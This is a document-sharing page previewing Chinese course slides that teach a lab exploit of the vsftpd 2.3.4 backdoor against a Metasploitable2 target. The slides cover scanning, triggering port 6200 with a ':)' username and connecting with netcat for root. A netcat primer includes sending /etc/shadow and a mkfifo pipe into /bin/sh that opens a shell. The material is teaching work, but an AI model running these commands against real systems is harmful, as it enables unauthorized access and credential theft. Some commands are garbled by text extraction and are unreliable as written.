網(wǎng)絡(luò)攻防項目實戰(zhàn) 課件 2.4 文件傳輸服務(wù)后門漏洞利用與加固_第1頁
網(wǎng)絡(luò)攻防項目實戰(zhàn) 課件 2.4 文件傳輸服務(wù)后門漏洞利用與加固_第2頁
網(wǎng)絡(luò)攻防項目實戰(zhàn) 課件 2.4 文件傳輸服務(wù)后門漏洞利用與加固_第3頁
網(wǎng)絡(luò)攻防項目實戰(zhàn) 課件 2.4 文件傳輸服務(wù)后門漏洞利用與加固_第4頁
網(wǎng)絡(luò)攻防項目實戰(zhàn) 課件 2.4 文件傳輸服務(wù)后門漏洞利用與加固_第5頁
已閱讀5頁,還剩13頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

2.4文件傳輸服務(wù)后門漏洞利用與加固020301環(huán)境部署漏洞滲透測試任務(wù)目錄漏洞介紹?FTP是一個文件傳輸協(xié)議,用戶通過FTP可從客戶機程序向遠程主機上傳或下載文件,常用于網(wǎng)站代碼維護、日常源碼備份等。在特定版本的vsftpd服務(wù)器程序中,被人惡意植入代碼,當用戶名包含”:)”時,服務(wù)器就會在6200端口監(jiān)聽,并且能夠執(zhí)行任意代碼。VSFTP2.3.4漏洞實驗環(huán)境部署針對ftp服務(wù)的后門漏洞01滲透環(huán)境Kali2.0下載:/get-kali/#kali-virtual-machines登錄信息:

用戶root

密碼toorkali網(wǎng)絡(luò)配置靶機環(huán)境靶機信息: metasploit2.0

登錄用戶 msfadmin

登錄密碼 msfadmin root賬號測試用

123456漏洞滲透測試VSFTP2.3.4漏洞滲透測試02漏洞滲透測試-信息收集1.收集網(wǎng)絡(luò)中存活的主機地址漏洞滲透測試-信息收集2.掃描系統(tǒng)類型以及端口信息漏洞滲透測試-信息收集3.在版本信息探測中,發(fā)現(xiàn)可能存在vsftp2.3.4漏洞漏洞滲透測試4.方式1:在物理機cmd中打開ftp輸入帶有:)符號的用戶名,任意密碼漏洞滲透測試4.方式2:在物理機打開ftp輸入帶有:)符號的用戶名,任意密碼漏洞滲透測試5.使用nmap–sS–p-32對目標進行全部對口掃描6.發(fā)現(xiàn)在利用:)笑臉符號登錄時會開啟6200后門端口漏洞滲透測試6.使用nc(瑞士軍刀)工具,我們可以通過端口連接目標主機,并獲得root權(quán)限任務(wù)一1.對靶機環(huán)境進行滲透測試2.找出上圖靶機的flag3.獲取目標靶機mysql權(quán)限,修改管理員登錄密碼為987654321Netcat擴展netcat:瑞士軍刀 nc/netcat(選項)(參數(shù)) nc322查看該ip此端口上運行的程序 -l使用監(jiān)聽模式,監(jiān)控傳入的資料

-p[num]指定端口例: 1.Server-l1234ClientServer.ip1234聊天效果 2.Server-l1234>/etc/shadowClientServer.ip>myfile文件傳輸 3.建立管道m(xù)kfifo/tmp/tmp_fifo cat/tmp/tmp_fifo|/bin/sh-i2>&

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論